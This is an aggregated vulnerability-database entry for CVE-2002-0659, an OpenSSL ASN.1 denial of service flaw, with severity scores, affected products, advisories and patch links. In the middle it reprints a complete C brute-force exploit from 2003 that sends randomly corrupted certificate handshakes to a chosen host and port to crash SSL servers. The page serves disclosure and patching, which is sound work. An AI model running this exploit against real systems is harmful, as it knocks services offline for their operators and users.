CVE-2002-0659
CVSS 5.0
Published: 2002-08-12 00:00:00
Revised: 2008-09-10 15:12:40

[Original] The ASN1 library in OpenSSL 0.9.6d and earlier, and 0.9.7-beta2 and earlier, allows remote attackers to cause a denial of service via invalid encodings.


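[CNNVD] OpenSSL ASN1 improper handling of invalid encodings denial-of-service vulnerability (CNNVD-200208-052)

        
        OpenSSL is an open-source implementation of SSL that provides strong encryption for network communication and is now widely used in all kinds of network applications.
        OpenSSL's ASN1 parser has a vulnerability in its handling of invalid encodings; a remote attacker could exploit it to mount a denial-of-service attack against applications that use the ASN1 library.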
        

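- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]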

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x:10.1.5  Apple Mac OS X 10.1.5
cpe:/a:openssl:openssl:0.9.4  OpenSSL Project OpenSSL 0.9.4
cpe:/a:oracle:application_server:1.0.2.2  Oracle Application Server 9i 1.0.2.2
cpe:/a:openssl:openssl:0.9.6a  OpenSSL Project OpenSSL 0.9.6a
cpe:/a:openssl:openssl:0.9.5  OpenSSL Project OpenSSL 0.9.5
cpe:/a:openssl:openssl:0.9.6  OpenSSL Project OpenSSL 0.9.6
cpe:/a:oracle:application_server:1.0.2.1s  Oracle Application Server 9i 1.0.2.1s
cpe:/o:apple:mac_os_x:10.1.4  Apple Mac OS X 10.1.4
cpe:/o:apple:mac_os_x:10.1  Apple Mac OS X 10.1
cpe:/a:openssl:openssl:0.9.7:beta1  OpenSSL Project OpenSSL 0.9.7 beta1
cpe:/a:oracle:corporate_time_outlook_connector:3.3  Oracle CorporateTime Outlook Connector 3.3
cpe:/o:apple:mac_os_x:10.0.1  Apple Mac OS X 10.0.1
cpe:/a:openssl:openssl:0.9.2b  OpenSSL Project OpenSSL 0.9.2b
cpe:/a:oracle:application_server  Oracle Application Server
cpe:/a:oracle:corporate_time_outlook_connector:3.1  Oracle CorporateTime Outlook Connector 3.1
cpe:/a:oracle:corporate_time_outlook_connector:3.1.2  Oracle CorporateTime Outlook Connector 3.1.2
cpe:/o:apple:mac_os_x:10.0.4  Apple Mac OS X 10.0.4
cpe:/o:apple:mac_os_x:10.0  Apple Mac OS X 10.0
cpe:/a:openssl:openssl:0.9.6b  OpenSSL Project OpenSSL 0.9.6b
cpe:/a:openssl:openssl:0.9.6c  OpenSSL Project OpenSSL 0.9.6c
cpe:/a:oracle:http_server:9.0.1  Oracle HTTP Server 9.0.1
cpe:/o:apple:mac_os_x:10.0.3  Apple Mac OS X 10.0.3
cpe:/o:apple:mac_os_x:10.1.3  Apple Mac OS X 10.1.3
cpe:/a:openssl:openssl:0.9.5a  OpenSSL Project OpenSSL 0.9.5a
cpe:/a:oracle:http_server:9.2.0  Oracle HTTP Server 9.2.0
cpe:/o:apple:mac_os_x:10.1.1  Apple Mac OS X 10.1.1
cpe:/a:openssl:openssl:0.9.1c  OpenSSL Project OpenSSL 0.9.1c
cpe:/o:apple:mac_os_x:10.0.2  Apple Mac OS X 10.0.2
cpe:/a:oracle:application_server:1.0.2  Oracle Application Server 9i 1.0.2
cpe:/a:openssl:openssl:0.9.6d  OpenSSL Project OpenSSL 0.9.6d
cpe:/a:openssl:openssl:0.9.3  OpenSSL Project OpenSSL 0.9.3
cpe:/o:apple:mac_os_x:10.1.2  Apple Mac OS X 10.1.2
cpe:/a:oracle:corporate_time_outlook_connector:3.1.1  Oracle CorporateTime Outlook Connector 3.1.1
cpe:/a:openssl:openssl:0.9.7:beta2  OpenSSL Project OpenSSL 0.9.7 beta2

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0659
(Official source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0659
(Official source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-052
(Official source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/748355
(UNKNOWN)  CERT-VN  VU#748355
http://www.cert.org/advisories/CA-2002-23.html
(UNKNOWN)  CERT  CA-2002-23
http://www.securityfocus.com/bid/5366
(UNKNOWN)  BID  5366
http://www.iss.net/security_center/static/9718.php
(UNKNOWN)  XF  openssl-asn1-parser-dos(9718)
http://rhn.redhat.com/errata/RHSA-2002-164.html
(UNKNOWN)  REDHAT  RHSA-2002:164
http://rhn.redhat.com/errata/RHSA-2002-161.html
(UNKNOWN)  REDHAT  RHSA-2002:161
http://rhn.redhat.com/errata/RHSA-2002-160.html
(UNKNOWN)  REDHAT  RHSA-2002:160
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000516
(UNKNOWN)  CONECTIVA  CLA-2002:516
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:33
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-033.1.txt
(UNKNOWN)  CALDERA  CSSA-2002-033.1
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-033.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-033.0

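- Vulnerability information

OpenSSL ASN1 improper handling of invalid encodings denial-of-service vulnerability
Medium severity  Boundary condition error
2002-08-12 00:00:00 2006-09-21 00:00:00
Remote
        
        OpenSSL is an open-source implementation of SSL that provides strong encryption for network communication and is now widely used in all kinds of network applications.
        OpenSSL's ASN1 parser has a vulnerability in its handling of invalid encodings; a remote attacker could exploit it to mount a denial-of-service attack against applications that use the ASN1 library.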
        

- Advisories and patches

        Vendor patches:
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2002-033.0) and corresponding patches for this issue:
        CSSA-2002-033.0: Linux: multiple vulnerabilities in openssl
        Link:
        http://www.caldera.com/support/security/advisories/CSSA-2002-033.0.txt

        Patch downloads:
        * OpenLinux 3.1.1 Server
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        * OpenLinux 3.1.1 Workstation
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        * OpenLinux 3.1 Server
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        * OpenLinux 3.1 Workstation
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        Conectiva
        ---------
        Conectiva has released a security advisory (CLA-2002:513) and corresponding patches for this issue:
        CLA-2002:513: openssl
        Link:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000513

        Patch downloads:
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-0.9.6-4U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-devel-0.9.6-4U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssl-0.9.6-4U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-devel-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-devel-static-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-doc-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-progs-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssl-0.9.6a-3U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-devel-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-devel-static-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-doc-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-progs-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssl-0.9.6c-2U8_1cl.src.rpm
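        Users of Conectiva Linux version 6.0 and later can update the RPM packages with apt:
        - Add the following line to /etc/apt/sources.list:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (If you are not running version 6.0, replace 6.0 above with the appropriate version number.)
        - Run: apt-get update
        - After the update, run: apt-get upgrade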
        Debian
        ------
        Debian has released a security advisory (DSA-136-1) and corresponding patches for this issue:
        DSA-136-1: Multiple OpenSSL problems
        Link:
        http://www.debian.org/security/2002/dsa-136

        Patch downloads:
        Source archives:
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.0.dsc

        Size/MD5 checksum: 782 de4c7b85648c7953dc31d3a89c38681c
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0

- Vulnerability information (23199)

OpenSSL ASN.1 Parsing Vulnerabilities (EDBID:23199)
multiple remote
2003-10-09 Verified
0 Syzop
N/A
source: http://www.securityfocus.com/bid/8732/info

Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. Attackers could exploit these issues to cause a denial of service or to execute arbitrary code. 

/* Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)
 * written by Bram Matthys (Syzop) on Oct 9 2003.
 *
 * This program sends corrupt client certificates to the SSL
 * server which will 1) crash it 2) create lots of error messages,
 * and/or 3) result in other "interesting" behavior.
 *
 * I was able to crash my own ssl app in 5-15 attempts,
 * apache-ssl only generated error messages but after several hours
 * some children went into some kind of eat-all-cpu-loop... so YMMV.
 *
 * It's quite ugly but seems to compile at Linux/FreeBSD.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/signal.h>
#include <arpa/nameser.h>
#include <sys/time.h>
#include <time.h>
#include <errno.h>

char buf[8192];

/* This was simply sniffed from an stunnel session */
const char dacrap[] =
"\x16\x03\x00\x02\x47\x0b\x00\x02\x43\x00\x02\x40\x00\x02\x3d\x30\x82"
"\x02\x39\x30\x82\x01\xa2\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06"
"\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x30\x57\x31\x0b\x30"
"\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06\x03\x55"
"\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31\x1f\x30"
"\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c\x20\x44"
"\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12\x30\x10"
"\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x30"
"\x1e\x17\x0d\x30\x33\x30\x36\x31\x32\x32\x33\x35\x30\x34\x39\x5a\x17"
"\x0d\x30\x34\x30\x36\x31\x31\x32\x33\x35\x30\x34\x39\x5a\x30\x57\x31"
"\x0b\x30\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06"
"\x03\x55\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31"
"\x1f\x30\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c"
"\x20\x44\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12"
"\x30\x10\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73"
"\x74\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01"
"\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xe6\x95\x5c\xc0"
"\xcb\x03\x78\xf1\x1e\xaa\x45\xb7\xa4\x10\xd0\xc1\xd5\xc3\x8c\xcc\xca"
"\x17\x7b\x48\x9a\x21\xf2\xfa\xc3\x25\x07\x0b\xb7\x69\x17\xca\x59\xf7"
"\xdf\x67\x7b\xf1\x72\xd5\x05\x61\x73\xe8\x70\xbf\xb9\xfa\xc8\x4b\x03"
"\x41\x62\x71\xf9\xf5\x4e\x28\xb8\x3b\xe4\x33\x76\x47\xcc\x1e\x04\x71"
"\xda\xc4\x0b\x05\x46\xf4\x52\x72\x99\x43\x36\xf7\x37\x6d\x04\x1c\x7a"
"\xde\x2a\x0c\x45\x4a\xb6\x48\x33\x3a\xad\xec\x16\xcc\xe7\x99\x58\xfd"
"\xef\x4c\xc6\xdd\x39\x76\xb6\x50\x76\x2a\x7d\xa0\x20\xee\xb4\x2c\xe0"
"\xd2\xc9\xa1\x2e\x31\x02\x03\x01\x00\x01\xa3\x15\x30\x13\x30\x11\x06"
"\x09\x60\x86\x48\x01\x86\xf8\x42\x01\x01\x04\x04\x03\x02\x06\x40\x30"
"\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x03\x81\x81"
"\x00\x9f\xff\xa9\x93\x70\xb9\xae\x48\x47\x09\xa1\x11\xbf\x01\x34\xbf"
"\x1f\x1e\xed\x88\x3e\x57\xe0\x37\x72\x0d\xec\xc7\x21\x44\x12\x99\x3a"
"\xfa\xaf\x79\x57\xf4\x7f\x99\x68\x37\xb1\x17\x83\xd3\x51\x44\xbd\x50"
"\x67\xf8\xd6\xd0\x93\x00\xbb\x53\x3d\xe2\x3d\x34\xfc\xed\x60\x85\xea"
"\x67\x7f\x91\xec\xfa\xe3\xd8\x78\xa2\xf4\x61\xfa\x77\xa3\x3f\xe4\xb1"
"\x41\x95\x47\x23\x03\x1c\xbf\x2e\x40\x77\x82\xef\xa0\x17\x82\x85\x03"
"\x90\x35\x4e\x85\x0d\x0f\x4d\xea\x16\xf5\xce\x15\x21\x10\xf9\x56\xd0"
"\xa9\x08\xe5\xf9\x9d\x5c\x43\x75\x33\xe2\x16\x03\x00\x00\x84\x10\x00"
"\x00\x80\x6e\xe4\x26\x03\x97\xb4\x5d\x58\x70\x36\x98\x31\x62\xd4\xef"
"\x7b\x4e\x53\x99\xad\x72\x27\xaf\x05\xd4\xc9\x89\xca\x04\xf1\x24\xa4"
"\xa3\x82\xb5\x89\x3a\x2e\x8f\x3f\xf3\xe1\x7e\x52\x11\xb2\xf2\x29\x95"
"\xe0\xb0\xe9\x3f\x29\xaf\xc1\xcd\x77\x54\x6a\xeb\xf6\x81\x6b\xd5\xd6"
"\x0a\x3d\xc3\xff\x6f\x76\x4a\xf7\xc9\x61\x9f\x7b\xb3\x25\xe0\x2b\x09"
"\x53\xcf\x06\x1c\x82\x9c\x48\x37\xfa\x71\x27\x97\xec\xae\x6f\x4f\x75"
"\xb1\xa5\x84\x99\xf5\xed\x8c\xba\x0f\xd5\x33\x31\x61\x5d\x95\x77\x65"
"\x8d\x89\x0c\x7d\xa7\xa8\x95\x5a\xc7\xb8\x35\x16\x03\x00\x00\x86\x0f"
"\x00\x00\x82\x00\x80\x78\x1d\xbd\x86\xcb\x6e\x06\x88\x57\x9e\x3d\x21"
"\x7e\xca\xd1\x75\xff\x33\xef\x48\x4d\x88\x96\x84\x8c\x2f\xfb\x92\x1d"
"\x15\x28\xef\xe0\xd3\x4d\x20\xe9\xae\x6c\x5c\xed\x46\xc0\xef\x4e\xb4"
"\xe4\xcf\xe9\x73\xb8\xd2\x8b\xe6\x5e\xb9\x0c\x67\xbe\x17\x13\x31\x3f"
"\xe5\xe1\x9a\x2d\xfe\xb4\xd6\xdb\x8f\xbc\x15\x22\x10\x65\xe1\xad\x5f"
"\x00\xd0\x48\x8d\x4e\xa7\x08\xbd\x5c\x40\x77\xb8\xa9\xbe\x58\xb0\x15"
"\xd2\x4c\xc8\xa1\x79\x63\x25\xeb\xa1\x32\x61\x3b\x49\x82\xf1\x3a\x70"
"\x80\xf8\xdc\xf7\xf9\xfc\x50\xc7\xa2\x5d\xe4\x30\x8e\x09\x14\x03\x00"
"\x00\x01\x01\x16\x03\x00\x00\x40\xfe\xc2\x1f\x94\x7e\xf3\x0b\xd1\xe1"
"\x5c\x27\x34\x7f\x01\xe9\x51\xd3\x18\x33\x9a\x99\x48\x6e\x13\x6f\x82"
"\xb2\x2c\xa5\x7b\x36\x5d\x85\xf5\x17\xe3\x4f\x2a\x04\x15\x2d\x0e\x2f"
"\x2c\xf9\x1c\xf8\x9e\xac\xd5\x6c\x20\x81\xe5\x22\x54\xf1\xe1\xd0\xfd"
"\x64\x42\xfb\x34";

#define CRAPLEN (sizeof(dacrap)-1)


int send_hello()
{
int len;
char *p = buf;
        *p++ = 22;                              /* Handshake */
        PUTSHORT(0x0300, p);    /* SSL v3 */
        PUTSHORT(85, p);                /* Length will be 85 bytes */

        *p++ = 1;                               /* Client hello */

        *p++ = 0;                               /* Length: */
        PUTSHORT(81, p);                /* 81 bytes */

        PUTSHORT(0x0300, p);    /* SSL v3 */
        PUTLONG(0xffffffff, p); /* Random.gmt_unix_time */

        /* Now 28 bytes of random data... (7x4bytes=28) */
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);

        *p++ = 0;                               /* Session ID 0 */

        PUTSHORT(42, p);                /* Cipher Suites Length */
        PUTSHORT(0x16, p);
        PUTSHORT(0x13, p);
        PUTSHORT(0x0a, p);
        PUTSHORT(0x66, p);
        PUTSHORT(0x07, p);
        PUTSHORT(0x05, p);
        PUTSHORT(0x04, p);
        PUTSHORT(0x65, p);
        PUTSHORT(0x64, p);
        PUTSHORT(0x63, p);
        PUTSHORT(0x62, p);
        PUTSHORT(0x61, p);
        PUTSHORT(0x60, p);
        PUTSHORT(0x15, p);
        PUTSHORT(0x12, p);
        PUTSHORT(0x09, p);
        PUTSHORT(0x14, p);
        PUTSHORT(0x11, p);
        PUTSHORT(0x08, p);
        PUTSHORT(0x06, p);
        PUTSHORT(0x03, p);

        *p++ = 1;                               /* Compression method length: 1 */
        *p++ = 0;                               /* (null) */

        len = p - buf;
        return len;
}

int send_crap()
{
        memcpy(buf, dacrap, CRAPLEN);
        return CRAPLEN;
}



void corruptor(char *buf, int len)
{
int cb, i, l;

        cb = rand()%15+1; /* bytes to corrupt */

        for (i=0; i < cb; i++)
        {
                l = rand()%len;
                buf[l] = rand()%256;
        }
}

void diffit()
{
int i;
        printf("DIFF:\n");
        for (i=0; i < CRAPLEN; i++)
        {
                if (buf[i] != dacrap[i])
                        printf("Offset %d: 0x%x -> 0x%x\n", i, dacrap[i], buf[i]);
        }
        printf("*****\n");
}


int main(int argc, char *argv[])
{
        struct sockaddr_in addr;
        int s, port = 0, first = 1, len;
        char *host = NULL;
        unsigned int seed;
        struct timeval tv;

        printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");

        if (argc != 3) {
                fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
                exit(1);
        }

        host = argv[1];
        port = atoi(argv[2]);
        if ((port < 1) || (port > 65535)) {
                fprintf(stderr, "Port out of range (%d)\n", port);
                exit(1);
        }

        gettimeofday(&tv, NULL);
        seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);

        printf("seed = %u\n", seed);
        srand(seed);

        memset(&addr, 0, sizeof(addr));


        signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */

while(1)
{

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                fprintf(stderr, "Socket error: %s\n", strerror(errno));
                exit(EXIT_FAILURE);
        }
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr.s_addr = inet_addr(host);
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
                fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
                if (!first)
                        diffit();
                exit(EXIT_FAILURE);
        }
        first = 0;
        printf("."); fflush(stdout);

        len = send_hello();
        write(s, buf, len);
        len = send_crap();
        corruptor(buf, len);
        write(s, buf, len);
        usleep(1000); /* wait.. */
        close(s);
}

        exit(EXIT_SUCCESS);
}

		

- Vulnerability information

3943
OpenSSL ASN.1 Parser Invalid Encoding Handling Remote DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- Vulnerability description

OpenSSL's ASN.1 parser contains a flaw that may allow a malicious user to cause Denial of Service conditions. The issue is triggered when invalid ASN.1 encodings are supplied to the parser. It is possible that the flaw may allow crashing of OpenSSL, resulting in a loss of availability.

- Timeline

2002-07-30 Unknown
2002-07-30 Unknown

- Solution

Upgrade to version 0.9.6e or higher and recompile all applications that were statically linked to OpenSSL, as that has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch to affected versions.

- Related references

- Vulnerability author

- Vulnerability information

OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
Boundary Condition Error 5366
Yes No
2002-07-30 12:00:00 2009-07-11 02:56:00
Discovered by Adi Stav <stav@mercury.co.il> and James Yonan <jim@ntlp.com>.

- Affected program versions

Secure Computing SafeWord PremierAccess 3.1
S.u.S.E. SuSE eMail Server 3.1
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle9i Application Server 1.0.2
Oracle Oracle9i Application Server
- Compaq Tru64 5.1
- Compaq Tru64 5.0 f
- Compaq Tru64 5.0 a
- Compaq Tru64 5.0
- Compaq Tru64 4.0 g
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.26
- HP HP-UX 10.20
- HP HP-UX 10.16
- HP HP-UX 10.10
- HP HP-UX 10.9
- HP HP-UX 10.8
- HP HP-UX 10.1 0
- HP HP-UX 10.0 1
- HP HP-UX 10.0
- HP HP-UX 9.10
- HP HP-UX 9.9
- HP HP-UX 9.8
- HP HP-UX 9.7
- HP HP-UX 9.6
- HP HP-UX 9.5
- HP HP-UX 9.4
- HP HP-UX 9.3
- HP HP-UX 9.1
- HP HP-UX 9.0
- HP HP-UX 8.9
- HP HP-UX 8.8
- HP HP-UX 8.7
- HP HP-UX 8.6
- HP HP-UX 8.5
- HP HP-UX 8.4
- HP HP-UX 8.2
- HP HP-UX 8.1
- HP HP-UX 8.0
- HP HP-UX 7.8
- HP HP-UX 7.6
- HP HP-UX 7.4
- HP HP-UX 7.2
- HP HP-UX 7.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- IBM AIX 4.1.2
- IBM AIX 4.1.1
- IBM AIX 4.1
- IBM AIX 4.0
- IBM AIX 3.2.5
- IBM AIX 3.2.4
- IBM AIX 3.2
- IBM AIX 3.1
- IBM AIX 3.0 x
- IBM AIX 2.2.1
- IBM AIX 1.3
- IBM AIX 1.2.1
- IBM AIX 5.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1
- Sun Solaris 1.1.4 -JL
- Sun Solaris 1.1.4
- Sun Solaris 1.1.3 _U1
- Sun Solaris 1.1.3
- Sun Solaris 1.1.2
- Sun Solaris 1.1.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun Solaris 2.2
- Sun Solaris 2.1
- Sun Solaris 2.0
- Sun Solaris 1.2
- Sun Solaris 1.1
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.0.1
Oracle CorporateTime Outlook Connector 3.3
Oracle CorporateTime Outlook Connector 3.1.2
Oracle CorporateTime Outlook Connector 3.1.1
Oracle CorporateTime Outlook Connector 3.1
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
Opera Software Opera Web Browser 6.0.2 win32
Opera Software Opera Web Browser 6.0.2 linux
Opera Software Opera Web Browser 6.0.1 win32
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Opera Software Opera Web Browser 6.0.1 linux
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
OpenSSL Project OpenSSL 0.9.6 b
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ OpenBSD OpenBSD 3.1
+ OpenBSD OpenBSD 3.0
